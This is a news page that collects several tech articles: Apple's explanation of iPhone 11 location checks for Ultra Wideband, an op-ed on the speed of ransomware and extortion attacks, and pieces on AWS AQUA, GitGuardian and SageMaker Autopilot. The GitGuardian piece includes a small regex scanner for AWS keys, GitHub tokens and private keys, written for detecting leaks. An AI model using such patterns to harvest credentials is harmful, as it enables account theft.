“So users can do things like share a file with someone using AirDrop simply by pointing at another user’s iPhone,” Apple’s statement reads. The company further explained that the location information indicator (a small, upward-facing arrow to the left of the battery icon) appears because the device periodically checks to see whether it is being used in a handful of countries for which Apple hasn’t yet received approval to deploy Ultra Wideband.

“Ultra Wideband technology is an industry standard technology and is subject to international regulatory requirements that require it to be turned off in certain locations,” the statement continues. “iOS uses Location Services to help determine if iPhone is in these prohibited locations in order to disable Ultra Wideband and comply with regulations. The management of Ultrawide Band compliance and its use of location data is done entirely on the device and Apple is not collecting user location data.”

Apple’s privacy policy says users can disable all apps and system services that query the user’s location all at once by toggling the main “Location Services” option to “off.” Alternatively, it says, users can achieve the same results by individually turning off all System Services that use location in the iPhone settings.

What prompted my initial inquiry to Apple about this on Nov. 13 was that the location services icon on the iPhone 11 would reappear every few minutes even though all of the device’s individual location services had been disabled.

“It is expected behavior that the Location Services icon appears in the status bar when Location Services is enabled,” Apple said in its initial response. “The icon appears for system services that do not have a switch in Settings” [emphasis added].

Now we know more about at least one of those services. Apple says it plans to include the option of a dedicated toggle in System Services to disable the UWB activity in an upcoming update of its iOS operating system, although it didn’t specify when that option might be available.

The one head-scratcher remaining is that the new iPhone seems to check whether it’s in a country that allows UWB fairly frequently, even though the list of countries where this feature is not yet permitted is fairly small, and includes Argentina, Indonesia and Paraguay. A complete list of countries where iPhones can use UWB is here. The principal remaining concern may be that these periodic checks unnecessarily drain the iPhone 11’s battery.
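The regulatory check Apple describes amounts to a simple on-device decision. As a toy sketch only (this is not Apple's code; the country list comes from the article above):

```python
# Toy model of the on-device UWB regulatory check.
# Countries named in the article where UWB is not yet permitted.
UWB_PROHIBITED = {"Argentina", "Indonesia", "Paraguay"}

def uwb_allowed(current_country: str) -> bool:
    """Decide locally whether Ultra Wideband may be enabled.

    Per Apple's statement, this check runs entirely on the device;
    no location data leaves the phone.
    """
    return current_country not in UWB_PROHIBITED

print(uwb_allowed("United States"))  # True
print(uwb_allowed("Argentina"))      # False
```

The open question is not the check itself but how often the phone needs to refresh its location to perform it, and what that costs in battery.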

It is never my intention to create alarm where none should exist; there are far too many real threats to security and privacy that deserve greater public attention and scrutiny from the news media. However, Apple does itself and its users no favors when it takes weeks to respond (or not, as my colleague Zack Whittaker at TechCrunch discovered) to legitimate privacy concerns, and then does so in a way that only generates more questions.

The Most Important Cyber Prediction for 2020 and Beyond: The Convergence of Speed

From a risk management standpoint, the cyber security threat landscape has jumped the shark. The ability to distinguish various threat motives, threat vectors and related impacts to an organization, its people, and its mission has arguably devolved over the last 5 years. We’ve been playing Security Risk Theater for too long, and it is time to get down to brass tacks and identify what ‘first things first’ actually looks like going forward in 2020. If we are not able to do this as a community of practitioners and leaders, the industry will be stuck in a seemingly endless state of entropy, chaos and risk.

feature image 2020 and beyond

There are times to reflect back upon the history of cybersecurity and learn from it, and this will always be the case. However, there are also times to abandon historical notions of lessons-learned and push forward into that great unknown whose precipice we are now upon. The perspective of this author, and indeed this author’s raison d’être from here on out, is to vocalize and mobilize, as clear and as loud as possible, that which is upon us and that which we must now solve together as a community. In short, we need nothing less than a willing, aware, and impassioned collective of leaders to embrace and expound upon a movement of hyper-awareness.

While there are myriad lenses through which to observe and articulate the thrust of this awareness movement, we will focus on just one for now, which I believe to be the most important:

The raw velocity of the threat landscape requires an even greater velocity of the cyber defensive landscape.

Forget About Threat Actor ‘Sophistication’

While there is much noise, FUD and dramatic dialogue about the sophistication of the threat landscape, I do not believe it is sophistication that has given the adversary the upper hand. In fact, the most severe destructive events of 2019 involved TTPs (Tactics, Techniques, Procedures) that were trivial in complexity or sophistication by any measure: reusing stolen passwords? Connecting to remotely accessible RDP services? Getting a user to click on a malicious Word document that executes Visual Basic code? A website dropping malware written in today’s flavor-of-the-month language?

As they have been for decades, these are the most trivial and universally understood means of attacking an organization or user to gain a foothold.

Oh, but what about the crazy sophisticated trojan payloads of today? From where I stand, they are no more sophisticated than they were nearly 20 years ago, when I wrote a paper entitled Trojan Warfare Exposed highlighting the multitude of features available in the commodity SubSeven trojan of the era: well over 150 discrete features and capabilities that, when compiled, still came in at less than 0.5 MB.

At the end of the day, malware is still doing malware things: gaining footholds, extracting passwords, evading and persisting, moving laterally, sniffing keystrokes, and helping criminals extort their victims.

But wait, you say, “we didn’t have ransomware back in 2000, did we?” If by ransomware you mean criminals extorting computer users for money, well, we did actually. And it was simply called a trojan, and hackers used trojans all the time to intimidate, extort and coerce their victims into taking actions or giving up information. A list of things hackers were doing in Y2K with trojans (taken from the above-linked paper):

    • Fake Windows logon script
    • Keyloggers that send keystrokes to the hacker’s email
    • The Matrix
    • Intimidation (“do it or else”)
    • Fake help desk message box
    • Simple trojan chat box
    • Webcam spy
    • Microsoft Text-to-Speech engine manipulation
    • AIM/ICQ/MSIM spies and/or impersonation
    • File downloads from the PC fed into a customized dictionary attack
    • Passwords stored in the registry, DUN account settings, etc.
    • Remote network sniffers

Suffice it to say that it is not sophistication that gives the modern attacker the advantage over us. From an attacker’s point of view, your network and your entire security stack are much more sophisticated in terms of raw code development, integration, compute power and design.

Hackers must face any number of disparate and diverse technologies in order to successfully evade, persist and move about a victim environment. Pundits argue that hackers only need to be right once to succeed, whereas defenders need to be right 100% of the time to prevent an incident. Those pundits haven’t spent enough time as an offensive red teamer. The opposite is true: a hacker needs to be right 100% of the time to pull off their objective undetected, and it is the defender that only needs to be right once to fully interrupt and halt the attacker’s kill chain.

But as an industry we don’t think of the problem space this way, because we have been in a state of reaction since the ‘breach era’ that began in 2013. We lament and exclaim to one another that it is only a matter of when, not if, we will be breached. Against this backdrop, we have come to believe the adversary is more sophisticated than we are. But they aren’t.

Speed is the Enemy’s Invisible Advantage

If there is one thing I learned in the 15 or so years I consulted in the Department of Defense (DoD) cyber space, it is this: No matter how much visibility, continuous monitoring or data crunching you do as an enterprise, none of it matters one lick if the enemy outpaces that effort.

This was incredibly apparent when one of the least sophisticated nation state threat actors at the time was able to compromise, persist within, and exfiltrate data from a million-device enterprise. It was also a painful lesson (at the time) in the area of web application security. Immense effort went into monitoring the logs of critical web applications, but none of the effort ever successfully prevented the risk impact to the mission from occurring.

Similarly, with callback (a.k.a. “C2” or “command and control”) detection, NetSec teams became inundated with alerts, all of which needed to be vetted, and all of which were acted upon only after the callback connections, along with the additional tool downloads, payloads, or data exfiltration taking place within those connections, had already occurred.

The same ‘time lag’ the Department of Defense struggled to address is the one we are all struggling to address now. It is the reason we are on our heels.

So we see that it is neither the sophistication of the threat, nor our inability to detect after-the-fact that gives the adversary the upper hand. When an accident happens on the freeway, there is often nothing sophisticated about what happened to cause it. And, when the forensics team comes to investigate what happened, they can usually piece together what the root cause was, what the safety failures were, what the driver behaviors/choices were, and what the damage/impact was. That is what hindsight gives us: 20/20 vision.

Human beings relish the ability to understand what has happened. We usually don’t even care how a bad thing might happen until after it has happened. That’s when shareholders pick up the phone. That’s when attorneys come into play. That’s when public statements and notifications need to be made. That is when we become interested as defenders in what just happened.

But by the time we initiate and complete those after-the-fact activities to get smarter about what happened, the adversary has already won in every sense of the word. They’ve gained security control without authorization. They’ve impacted the organization before the organization even realizes it. They’ve elevated privileges, run queries, grabbed data, or destroyed it. They’ve. Already. Won.

Reject the ‘Good Loser’ Mentality

Yet here we are still trying to frame this entire landscape in human time frames… minutes, days, weeks, months and years. One minute to detection? Are you kidding? We turn up to the game a minute after the final whistle? It’s already over!

Don’t talk about dwell times and how millions can be saved if you can just keep a breach dwell time under 200 days instead of the average 285 days. That’s hotwash. That’s risk offset. We have fallen into the fake comfort of explaining what happened, of justifying our failure. We do all the things a professional sports team might do after they lose the game.

And we’ve gotten so good at these things that it has affected our very ability to perceive and attack the problem. It has become the language of cyber security. There are even vendors that proclaim the ‘standard’ of how long it takes to detect, alert and remediate an incident should be measured in minutes and hours. As if the actual adversary even cares what a vendor’s SLA might be. As if we are still living in the 2013-2015 post-breach ‘wake-up call’ world. As if our primary role as a CISO is to be able to describe with perfect visibility, exactly how the enemy of the organization just succeeded in negatively impacting our organization and its mission. How far we’ve strayed from the basic tenets of information security of the 1990s! How much profit and pleasure the adversary takes in us having done so!

And let’s be honest: how much profit and pleasure has the security vendor industry also taken in perpetuating the problem by never fully solving it and charging for EPS (events per second), alerts, data retention time in the cloud, incident response services, and (insert all the fantastic cyber pew pew here)?

What Does 2020 and Beyond Look Like?

We’ve seen this coming. We’ve all talked about it. I predicted in 2016 that ransomware campaigns would begin to leverage much more than just encryption routines to extort us. It was telling, then, when a Mexican oil and gas company was targeted by a DoppelPaymer ransomware campaign (whose lightning-fast payload performs over 2,000 malicious operations on the host in less than 7 seconds) that also affected its cardiac/hospital care center in Tabasco, even though the author of the malware embedded a comment in their code that reads:

“We don’t care who you are and why this happens. No one died. That’s all.”

That same ransom note also threatened to dox (expose, leak) or sell sensitive information the attackers said they had exfiltrated prior to encrypting the network, should the victim not pay the ransom in time. And speaking of time: it matters. Vanderbilt recently completed a study showing that over 2,100 cardiac patients die every year in America due to cyber breaches and ransom events and their effect on hospitals, and it comes down to the additional 2.7 minutes it takes to get an EKG performed before a doctor knows what the correct treatment is.

It was even more instructive when, on the 25th of November this year, we learned that the ChaCha (aka TA2101) ransomware gang actually did leak 700 MB of data from their victim, Allied Universal ($7B valuation), after Allied decided not to pay the $2.1m ransom, which has since ballooned to $4m following the delay in payment. This marks the first publicly known event in which such ‘secondary extortion’ has been exerted on a victim.

That will in turn lead to other universally ugly evolutions, such as dropping CP (child pornography) files inside an organization to further pressure and overwhelm a victim into paying. We’ve already seen this happen during non-ransomware targeted attacks, when attackers left CP behind on purpose, knowing that doing so changes the forensics landscape by forcing HR intervention and triggering mandatory CP reporting laws.

Entire email account inboxes can be leveraged as well: nothing is off-limits in the mind of the criminal extortionist. Case in point: the same attackers that targeted Allied also gained access to private Allied.com email keys that had been stored in plaintext, and which could be used by, say, an Emotet campaign operator to spoof malicious spam from the company’s domain. This represents yet another form of risk to Allied, and it effectively lets the attacker apply even greater pressure.

Putting It All Into Perspective

Most organizations realize they are victim to a ransomware event only after the first few machines begin to get encrypted. By this time, the majority of attack kill chains have already played out. Footholds were gained, credentials stolen, lateral movement achieved, spreading via domain credentials and tools accomplished, persistence established and (as we just learned above) sensitive data already exfiltrated.

Note that the same ‘low and slow’ breach story of 2013-2015 isn’t what is at play here. Attackers can much more easily discover and exfiltrate sensitive data now, and whether this data is the ‘crown jewels’ or not is nearly irrelevant in the context of the modern hyper-velocity kill chain. It is leverage, nothing more. It leverages the imagination of the victim more than it leverages the value of the stolen data on the dark web.

It doesn’t matter if the attacker gets salted password hashes, secret-sauce formulas, customer lists, PHI/PCI, or inventory/warehousing data; so long as it is seen that the attackers stole data, the reputational damage is done.

Just like FIN6 might pivot from an initial RDP foothold to a one-word query for a gift-card portal on a BigFix device, the modern extortionist hacker might simply reduce their exfiltration strategy to: “What’s the most data I can find, access and exfiltrate the soonest?” And though it may sound like a bold assertion, there is simply no reason why a criminal group targeting an organization wouldn’t grab already-leaked or sold data for that organization from the deep/dark web prior to launching a targeted ransomware campaign, then claim they have access to and have exfiltrated current data.

No matter how we imagine 2020 and beyond to play out, one thing is certain: It will continue to play out faster than it has in the past. It will continue to overwhelm — by speed, not sophistication — legacy security controls and after-the-fact visibility efforts. It will continue to reward the criminals that are the laziest and the quickest. It will continue to employ as many forms of leverage as an attacker can easily bestow on their victim. It will continue to move at the speed of computing itself when it comes to how fast a given payload can execute, modify, evade, persist and control a target asset.

This applies not only to Traditional IT workstations and servers, but also to VDI environments and within the cloud workload migration story unfolding before us. The technology, intelligence, and security enforcement required to stop these fast moving threats needs to be present in both the cloud as well as at the edge (on the endpoint), whatever that endpoint may be. To the extent we do not solve the speed advantage the attacker has had over us, we will remain embattled, in retreat, and at risk. The real threat convergence story revolves around speed, not sophistication.

So What Can We Do?

Thankfully, there are organizations that have already realized this new reality and have adapted their strategies, their staffing goals, their security stack and their understanding of what true risk offset looks like going forward. Mostly, these are organizations that either endured an event like WannaCry or NotPetya two years ago, or have had their production or services directly affected by more recent ransomware variants like DoppelPaymer or Maze. I’ve said it before and I’ll keep saying it:

There are now only two kinds of organizations in the world today: those that have been through these kinds of destructive, fast-moving events, and those that have not; these two kinds of organizations look, feel, budget, staff and operate completely differently from one another.

You can almost reduce the modern CISO challenge down to the task of getting an organization that hasn’t been through a major destructive event to act as if it has anyway, so that it takes the necessary steps to get ahead of these fast-moving threats and prevent such an event from ever happening.

Hint: this isn’t about backup-and-restore strategies and different risk offsets. This isn’t about 1/10/60 SLAs with cloud-native vendors persuading you they have a chance at stopping code-on-code run-time threats. This isn’t about reacting and setting expectations with the board that it’s only a matter of time before the bad day happens.

No, this is about the hard work of actually beating the adversary at their own game: speed.

To do that, I’ll leave you with what is probably the best word to describe the entire movement upon us: anticipation. But a new kind of anticipation, one that focuses on where and when the actual fight in the ring is happening, not in the locker room after the fighter has already lost and is bloodied and battered, trying to restore herself.

When the bell rings and it is go-time, the fighter doesn’t get to dial up The Cloud for answers. She doesn’t get to crowdsource her intelligence from all the onlookers in the stands. She doesn’t even get to listen to the coach shouting from the ropes. Nope. She needs to keep her eyes on the opponent’s hips and anticipate the next move, and even more importantly, respond in fractions of a second, with a counter-punch to knock them out.

After all, when is it OK as a boxer to be on your heels? For those who know, the answer is: never.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

AWS speeds up Redshift queries 10x with AQUA

At its re:Invent conference, AWS CEO Andy Jassy today announced the launch of AQUA (the Advanced Query Accelerator) for Amazon Redshift, the company’s data warehousing service. As Jassy noted in his keynote, it’s hard to scale data warehouses when you want to do analytics over that data. At some point, as your data warehouse or lake grows, the data starts overwhelming your network or available compute, even with today’s high-speed networks and chips. To handle this, AQUA is essentially a hardware-accelerated cache, and it promises up to 10x better query performance than competing cloud-based data warehouses.

“Think about how much data you have to move over the network to get to your compute,” Jassy said. And if that’s not a problem for a company today, he added, it will likely become one soon, given how much data most enterprises now generate.

With this, Jassy explained, you’re bringing the compute power you need directly to the storage layer. The cache sits on top of Amazon’s standard S3 service and can hence scale out as needed across as many nodes as needed.

AWS designed its own analytics processors to power this service and accelerate the data compression and encryption on the fly.
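The benefit of pushing compute down to the storage layer can be pictured with a toy model (illustrative only; the row counts are made up and this is not AWS's implementation): filtering at the storage node means only matching rows cross the network, instead of the whole table.

```python
# Toy model: compute-at-storage vs. compute-at-client.
# 10,000 "us-east-1" rows and 10 "eu-west-1" rows (illustrative numbers).
ROWS = ([{"region": "us-east-1", "bytes": 100} for _ in range(10_000)]
        + [{"region": "eu-west-1", "bytes": 100} for _ in range(10)])

def naive_query():
    """Ship every row over the network, then filter at the compute node."""
    shipped = list(ROWS)  # entire table crosses the wire
    result = [r for r in shipped if r["region"] == "eu-west-1"]
    return len(shipped), result

def pushdown_query():
    """Filter at the storage layer; only matching rows cross the wire."""
    shipped = [r for r in ROWS if r["region"] == "eu-west-1"]
    return len(shipped), shipped

print(naive_query()[0])     # 10010 rows moved over the network
print(pushdown_query()[0])  # 10 rows moved over the network
```

Both queries return the same 10 rows; the difference is how much data had to move to produce them, which is the bottleneck Jassy describes.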

Unsurprisingly, the service is also 100% compatible with the current version of Redshift.

In addition, AWS today announced next-generation compute instances for Redshift, the RA3 instances, with 48 vCPUs, 384 GiB of memory and up to 64 TB of storage. You can build clusters of these with up to 128 instances.

GitGuardian raises $12M to help developers write more secure code and ‘fix’ GitHub leaks

Data breaches that can cause millions of dollars in damages have become the bane of many a company. Preventing them requires a great deal of real-time monitoring, and the problem is that this world has become incredibly complex. A SANS Institute survey found half of company data breaches were the result of account or credential hacking.

GitGuardian has attempted to address this with a highly developer-centric cybersecurity solution.

It’s now attracted the attention of major investors, to the tune of $12 million in Series A funding, led by Balderton Capital. Scott Chacon, co-founder of GitHub, and Solomon Hykes, founder of Docker, also participated in the round.

The startup plans to use the investment from Balderton Capital to expand its customer base, predominantly in the U.S. Around 75% of its clients are currently based in the U.S., with the remainder being based in Europe, and the funding will continue to drive this expansion.

Built to uncover sensitive company information hiding in online repositories, GitGuardian says its real-time monitoring platform can address the data leaks issues. Modern enterprise software developers have to integrate multiple internal and third-party services. That means they need incredibly sensitive “secrets,” such as login details, API keys and private cryptographic keys used to protect confidential systems and data.

GitGuardian’s systems detect thousands of credential leaks per day. The team originally built its launch platform with public GitHub in mind; however, GitGuardian is built as a private solution to monitor and notify on secrets that are inappropriately disseminated in internal systems as well, such as private code repositories or messaging systems.
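GitGuardian's detection engine is proprietary, but the general idea behind secrets detection can be sketched with regular expressions that match well-known credential formats. The patterns below are simplified illustrations, not GitGuardian's rules; real scanners combine hundreds of detectors with entropy checks and contextual filtering to cut false positives.

```python
import re

# Simplified patterns for a few well-known credential formats.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_token":      re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "private_key":       re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
}

def scan(text: str):
    """Return (kind, match) pairs for every suspected secret in `text`."""
    hits = []
    for kind, pattern in SECRET_PATTERNS.items():
        for m in pattern.finditer(text):
            hits.append((kind, m.group(0)))
    return hits

snippet = 'aws_key = "AKIAIOSFODNN7EXAMPLE"  # oops, hardcoded'
print(scan(snippet))  # [('aws_access_key_id', 'AKIAIOSFODNN7EXAMPLE')]
```

Run against every commit in real time, even a crude scanner like this makes it clear why hardcoded credentials surface so quickly once pushed to a public repository.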

Solomon Hykes, founder of Docker and investor at GitGuardian, said: “Securing your systems starts with securing your software development process. GitGuardian understands this, and they have built a pragmatic solution to an acute security problem. Their credentials monitoring system is a must-have for any serious organization.”

Do they have any competitors?

Co-founder Jérémy Thomas told me: “We currently don’t have any direct competitors. This generally means that there’s no market, or the market is too small to be interesting. In our case, our fundraise proves we’ve put our hands on something huge. So the reason we don’t have competitors is because the problem we’re solving is counterintuitive at first sight. Ask any developer, they will say they would never hardcode any secret in public source code. However, humans make mistakes and when that happens, they can be extremely serious: it can take a single leaked credential to jeopardize an entire organization. To conclude, I’d say our real competitors so far are black hat hackers. Black hat activity is real on GitHub. For two years, we’ve been monitoring organized groups of hackers that exchange sensitive information they find on the platform. We are competing with them on speed of detection and scope of vulnerabilities covered.”

AWS AutoPilot gives you more visible AutoML in SageMaker Studio

Today at AWS re:Invent in Las Vegas, the company announced AutoPilot, a new tool that gives you greater visibility into automated machine learning model creation, known as AutoML. This new tool is part of the new SageMaker Studio also announced today.

As AWS CEO Andy Jassy pointed out onstage today, one of the problems with AutoML is that it’s basically a black box. If you want to improve a mediocre model, or just evolve it for your business, you have no idea how it was built.

The idea behind AutoPilot is to give you the ease of model creation you get from an AutoML-generated model, but also give you much deeper insight into how the system built the model. “AutoPilot is a way to create a model automatically, but give you full visibility and control,” Jassy said.

“Using a single API call, or a few clicks in Amazon SageMaker Studio, SageMaker Autopilot first inspects your data set, and runs a number of candidates to figure out the optimal combination of data preprocessing steps, machine learning algorithms and hyperparameters. Then, it uses this combination to train an Inference Pipeline, which you can easily deploy either on a real-time endpoint or for batch processing. As usual with Amazon SageMaker, all of this takes place on fully-managed infrastructure,” the company explained in a blog post announcing the new feature.

You can look at the model’s parameters, and see 50 automated models, and it provides you with a leader board of which models performed the best. What’s more, you can look at the model’s underlying notebook, and also see what trade-offs were made to generate that best model. For instance, it may be the most accurate, but sacrifice speed to achieve that accuracy.

Your company may have its own set of unique requirements and you can choose the best model based on whatever parameters you consider to be most important, even though it was generated in an automated fashion.
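Picking from an Autopilot-style leader board by your own criteria can be sketched as a simple weighted ranking. The candidate names and metrics below are made up for illustration; they are not SageMaker output.

```python
# Hypothetical candidates from an AutoML leader board (illustrative data).
candidates = [
    {"name": "xgb-17",   "accuracy": 0.94, "latency_ms": 120},
    {"name": "linear-3", "accuracy": 0.88, "latency_ms": 5},
    {"name": "mlp-9",    "accuracy": 0.92, "latency_ms": 30},
]

def pick_best(models, accuracy_weight=1.0, latency_weight=0.0):
    """Rank models by a weighted trade-off between accuracy and speed."""
    def score(m):
        # Penalize latency (converted to seconds) against raw accuracy.
        return accuracy_weight * m["accuracy"] - latency_weight * (m["latency_ms"] / 1000)
    return max(models, key=score)

print(pick_best(candidates)["name"])                      # accuracy only: xgb-17
print(pick_best(candidates, latency_weight=1.0)["name"])  # speed penalized: mlp-9
```

The point is that "best" is a function of your weights, not a single number, which is the flexibility the leader board is meant to give you.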

Once you have the model you like best, you can go into SageMaker Studio, select it and launch it with a single click. The tool is available now.